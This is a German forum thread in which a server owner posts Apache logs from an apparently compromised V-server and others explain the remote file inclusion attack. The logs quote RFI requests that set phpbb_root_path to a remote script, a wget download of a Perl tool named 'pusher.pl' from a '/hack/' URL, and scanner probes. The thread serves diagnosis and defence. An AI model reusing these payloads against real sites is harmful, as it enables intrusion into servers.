Server stürzt nach paar Tagen ab

[Balduran]

Guten Tag,
Ich betreibe nun seit einem Jahr meinen V-Server bei vserver.de und hatte da bisher auch nie Proble nur seit ein paar Wochen ist es so, dass der Server sich nach einiger Zeit aufhängt.
Ich habe zwar über Ping und SSH noch eine Verbindungsmöglichkeit nur der Webserver scheint nicht mehr so zu laufen wie er soll. Unter ps -aux finde ich ihn zwar noch gelistet aber trotzt dem meldet er sich nicht über einen Browser.
Ich habe daraufhin mal meine Logs durchgeguckt und bin auf einige komische Einträge gestoßen.
Kann mir einer erklären was das bedeutet:

127.0.0.1 - - [27/Oct/2007:14:45:59 +0200] "GET /?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 302 446 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
127.0.0.1 - - [27/Oct/2007:14:45:59 +0200] "GET /apache2-default/?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 200 1457 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
127.0.0.1 - - [27/Oct/2007:14:45:59 +0200] "GET /?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 302 446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
127.0.0.1 - - [27/Oct/2007:14:45:59 +0200] "GET /apache2-default/?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 200 1457 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
127.0.0.1 - - [27/Oct/2007:14:46:17 +0200] "GET /?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 302 446 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
127.0.0.1 - - [27/Oct/2007:14:46:17 +0200] "GET /apache2-default/?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 200 1457 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
127.0.0.1 - - [27/Oct/2007:14:46:18 +0200] "GET /?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 302 446 "-" "Mozilla/3.0 (OS/2; U)"
127.0.0.1 - - [27/Oct/2007:14:46:18 +0200] "GET /apache2-default/?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 200 1457 "-" "Mozilla/3.0 (OS/2; U)"
127.0.0.1 - - [27/Oct/2007:14:46:18 +0200] "GET /?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 302 446 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
127.0.0.1 - - [27/Oct/2007:14:46:18 +0200] "GET /apache2-default/?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 200 1457 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
127.0.0.1 - - [27/Oct/2007:14:46:20 +0200] "GET /?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 302 446 "-" "Microsoft Pocket Internet Explorer/0.6"
127.0.0.1 - - [27/Oct/2007:14:46:20 +0200] "GET /apache2-default/?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 200 1457 "-" "Microsoft Pocket Internet Explorer/0.6"
127.0.0.1 - - [27/Oct/2007:14:46:21 +0200] "GET /?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 302 446 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
127.0.0.1 - - [27/Oct/2007:14:46:21 +0200] "GET /apache2-default/?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 200 1457 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
127.0.0.1 - - [27/Oct/2007:14:46:21 +0200] "GET /?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 302 446 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
127.0.0.1 - - [27/Oct/2007:14:46:21 +0200] "GET /apache2-default/?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 200 1457 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
127.0.0.1 - - [27/Oct/2007:14:46:28 +0200] "GET /?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 302 446 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
127.0.0.1 - - [27/Oct/2007:14:46:28 +0200] "GET /apache2-default/?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 200 1457 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
127.0.0.1 - - [27/Oct/2007:14:46:36 +0200] "GET /?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 302 446 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
127.0.0.1 - - [27/Oct/2007:14:46:36 +0200] "GET /apache2-default/?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 200 1457 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
127.0.0.1 - - [27/Oct/2007:14:46:37 +0200] "GET /?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 302 446 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
127.0.0.1 - - [27/Oct/2007:14:46:37 +0200] "GET /apache2-default/?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 200 1457 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
127.0.0.1 - - [27/Oct/2007:14:46:52 +0200] "GET /?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 302 446 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
127.0.0.1 - - [27/Oct/2007:14:46:52 +0200] "GET /apache2-default/?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 200 1457 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
127.0.0.1 - - [27/Oct/2007:14:47:00 +0200] "GET /?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 302 446 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
127.0.0.1 - - [27/Oct/2007:14:47:00 +0200] "GET /apache2-default/?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 200 1457 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
127.0.0.1 - - [27/Oct/2007:14:47:44 +0200] "GET /?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 302 446 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
127.0.0.1 - - [27/Oct/2007:14:47:44 +0200] "GET /apache2-default/?phpbb_root_path=http://www.lostwarriors.com//vwar/convert/main.txt%3f HTTP/1.1" 200 1457 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"

Ich habe nichts mit der Domain lostwarriors.com zutun aber trotzdem versucht mein Server (da steht ja 127.0.0.1) damit etwas zu machen?!

 

[Mordor]

Da versucht jemand eine PHP-Variable auf deinem Server zu füllen. Es sieht aus wie eine XSS (Cross-Side-Skripting) Attacke. Ob das das Problem deines Webservers ist, ist allerdings fraglich.

Ich deine Forensoftware up to date?

 

[Firewire2002]

Da versucht jemand eine PHP-Variable auf deinem Server zu füllen

Hmm, jemand ist gut.
Von localhost?

Da hast du dir wohl ein Tool eingefangen, was diese Aktivitäten ausführt.

 

[Wildcat]

Hast du auf dem Server ein phpBB laufen?

Es versucht die Lücke einiger älterer phpBB Versionen auszunutzen und
den phpbbrootpath neu zu setzen, die Datei die er dabei angibt ist ein php
Script was versucht über system,exec usw einige Shellbefehle abzusetzen,
wäre dann konkret eine RFI (remote file inclusion) Attacke.

Wenn allerdings register_globals nicht an ist, sollte das so und so nicht funktionieren.

 

[Balduran]

Also in php.ini steht es auf off
und bei phpinfo(); ist es als local value on und als master value off
In der tat muss ich da ein Forum noch auf den neusten Stand bringen...

Werd ich das mal machen. Wenn ich das dann aber getan habe kann ich dann irgendwie trotzdem was gegen diese andauernden Angriffe machen zum beispiel irgendwie die Verbindung zu der Domain Lostwarriors.com komplett verbieten??

 

[Firewire2002]

Da die Verbindungen von localhost kommen, befindet sich auf deinem Server wohl eine Software die diese Anfragen stellt. (Wieso muss ich mich eigentlich Wiederholen (#3))

Software finden, beenden, löschen.

 

[DarkBlue]

Schönen guten Abend,
ich habe das gesamte "vwar" script auf dem Webserver samt DB gelöscht.

Die entstandenen Unannehmlichkeiten bitten wir zu Entschuldigen

 

[Deleted member 2641]

und bei phpinfo(); ist es als local value on und als master value off

Hast du ne Software die register_globals wirklich braucht?
Wenn nicht solltest du das fuer den vhost (oder besser fuer alle) deaktivieren

 

[Balduran]

Ich hab eben nachem Frühstück wie gewohnt meinen Server kontrolliert und schon wieder ist der Apache2 tot...

Im error.log steht einfach nur das hier als letzter Eintrag:

[Sun Nov 04 04:08:25 2007] [notice] caught SIGTERM, shutting down

Davor keine auffälligen Einträge (nur durchgehend irgendwelche fehlermeldungen weil der immer favicons sucht und ich keine habe).

Irgendwann weiter vorher steht dann allerdings das hier was mich ziemlich stutzig macht:

sh: line 1: /var/www/empty/uname: Permission denied
sh: line 1: /var/www/empty/id: Permission denied
sh: line 1: /var/www/empty/echo: Permission denied
sh: line 1: /var/www/empty/uname: Permission denied
sh: line 1: /var/www/empty/id: Permission denied
sh: line 1: /var/www/empty/echo: Permission denied
sh: line 1: /var/www/empty/uname: Permission denied
sh: line 1: /var/www/empty/id: Permission denied
sh: line 1: /var/www/empty/echo: Permission denied
sh: line 1: /var/www/empty/uname: Permission denied
sh: line 1: /var/www/empty/id: Permission denied
sh: line 1: /var/www/empty/echo: Permission denied
--16:54:02-- http://cocc0z.altervista.org/hack/pusher.pl
=> `pusher.pl'
Resolving cocc0z.altervista.http://cocc0z.altervista.org/hack/pusher.plorg... 87.117.204.43
Connecting to cocc0z.altervista.org[87.117.204.43]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,974 [text/plain]

0K .......... ..... 100% 265.52 KB/s

16:54:02 (265.52 KB/s) - `pusher.pl' saved [15974/15974]

Can't call method "autoflush" on an undefined value at pusher.pl line 28.

Wie kann es sein, dass mein Server plötzlich eine Datei ausführt ohne das ich es sage.

Ich hab bisher nicht die Software gefunden die sowas ausführt aber irgendwie scheint da mächtig was schief zu laufen wenn ich im access.log des ApacheServers nachschaue finde ich unter anderem auch sowas:

$
80.88.161.125 - - [03/Nov/2007:22:55:09 +0100] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 226 "-" "-"
80.207.148.107 - - [04/Nov/2007:00:28:16 +0100] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 226 "-" "-"
129.27.134.130 - - [04/Nov/2007:02:57:19 +0100] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 226 "-" "-"

Zusätzlich sind da noch zig Einträge von irgendwelchen Servern (Der Name Morfeus Fucking Scanner steht da zum Beispiel...), die auf verdacht einfach alle möglichen Dateinamen ausprobieren.

Gibt es da vielleicht ein Modul welches alle möglichen verdächtigen IPs sperrt?


-----------------------

Was noch komisch ist, immer wenn der Webserver dann abschmiert läuft nurnoch der Prozess:
www-data 3202 0.0 0.1 2104 568 ? S Oct29 0:41 /usr/local/apache/bin/httpd -DSSL
www-data 11436 0.0 0.1 2104 568 ? S Oct29 0:41 /usr/local/apache/bin/httpd -DSSL
www-data 15363 0.0 0.1 2104 588 ? S Oct31 0:25 /usr/local/apache/bin/httpd -DSSL
alle anderen haben nichts mit http zutun. Das komische ist nur, dass das Verzeichnis "/usr/local/apache/bin/" gar nicht existiert???
Dazu kommt noch, dass ich den apache2 Server nicht starten kann nur durch komplettes neu starten des V-Servers...